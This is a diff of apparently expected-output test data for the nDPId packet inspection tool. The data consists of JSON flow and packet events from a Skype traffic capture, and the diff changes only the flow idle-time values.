00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzWEAAEARKc3AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431969728511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969728511,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIsLcAAEARRULAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":180000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1431969728749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1431969728749,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIPEXQAAAER9GvAqAFc7\/\/\/+sOkB2wB+wkMTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xMC4yMTEuNTUuMzoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmNiYzc4NWUtMjVmNC00MGNhLTk4YjUtMGQ1ODA0YWRhYThlDQpVU046dXVpZDoyY2JjNzg1ZS0yNWY0LTQwY2EtOThiNS0wZDU4MDRhZGFhOGU6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDptYXgtYWdlPTkwMA0KU2VydmVyOk1pY3Jvc29mdC1XaW5kb3dzLU5ULzUuMSBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOmQ0NmQ1MDA5ZTE0NzFiYTY4MDBlNDNlN2YwZTEyZWU0DQoNCg=="} @@ -1001,7 +1001,7 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1431969735255,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969735255,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQGgAAEARFBbAqAEiarz5ujLdOxAAGjrunqMCSv26L3gQtCJn9dl5F8Bv"} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACh3hQAAAERKXPAqAEi7\/\/\/+t42B2wAjVUWTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="} 00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -1014,10 +1014,10 @@ 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969745776,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoljUAAEARYRzAqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1431969746031,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969746031,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoS5QAAEARq73AqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2621,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1431969746545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969746545,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo\/FMAAEAR+v3AqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969750597,"flow_last_seen":1431969750597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969750597,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1431969750597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969750597,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYx1AAEAGQ2nAqAEinTg1L8PWMD5iE\/TfAAAAALAC\/\/\/p7gAAAgQFtAEDAwUBAQgKPiQvsAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2651,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969750865,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGs4qdODUvwKgBIjA+w9azhlZQYhP04KASOJDCuQAAAgQFrAQCCApiCpO7PiQvsAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969750597,"flow_last_seen":1431969750597,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969750597,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.53.47","src_port":50134,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1431969750597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969750597,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYx1AAEAGQ2nAqAEinTg1L8PWMD5iE\/TfAAAAALAC\/\/\/p7gAAAgQFtAEDAwUBAQgKPiQvsAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2651,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1431969750865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969750865,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGs4qdODUvwKgBIjA+w9azhlZQYhP04KASOJDCuQAAAgQFrAQCCApiCpO7PiQvsAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"} 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1431969751302,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":12,"thread_ts_msec":1431969751302,"pkt":"AQBeAAAB0NQSxnP1CABGwAAkAABAAAECQmnAqAEB4AAAAZQEAAARZOweAAAAAAJ9AAAAAAAAAAAAAAAA"} 00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2660,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969751302,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} @@ -1025,126 +1025,114 @@ 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1431969759543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759543,"pkt":"0NQSxnP1PBXCt3IOCABFwABMl\/4AAEAR3SbAqAEiEf0w9QB7AHsAOFSa4wIG7AAAChwAAPSnEf0w9dkEndkb+ycx2QSd2Rb0\/7nZBJ3ZG\/snMdkEnl+LA3WC"} 00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2761,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969759543,"flow_last_seen":1431969759543,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969759543,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.253.48.245","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2763,"source":"skype.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1431969759588,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1431969759588,"pkt":"PBXCt3IO0NQSxnP1CABFAABMAABAADgRPeUR\/TD1wKgBIgB7AHsAOA1EJAEG7AAAAAAAAAAMR1BTc9kEnl2e8n962QSeX4sDdYLZBJ5fkbdSxdkEnl+RubQR"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50135,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"skype.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABArS9AAEAG3hDAqAEiTKehBsPXTzInl3a\/AAAAALAC\/\/8aLgAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2922,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABALoZAAEAG+q7AqAEiR+4Hy8PYSU+K+FHXAAAAALAC\/\/9\/iwAAAgQFtAEDAwUBAQgKPiR90gAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969770694,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969770694,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50137,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2923,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1431969770694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770694,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQGxAAEAGd6zAqAEiBfi63cPZeSJOVOkRAAAAALAC\/\/+EAwAAAgQFtAEDAwUBAQgKPiR90wAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2924,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1431969770813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969770813,"pkt":"PBXCt3IO0NQSxnP1CABFAABA2Z5AAHIGrHkF+LrdwKgBInkiw9nUmdR+TlTpErASRBBRzQAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2925,"source":"skype.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1431969770814,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969770814,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mqxAAEAGHXjAqAEiBfi63cPZeSJOVOkS1JnUf4AQECwKBgAAAQEICj4kfkoAAAAA"} 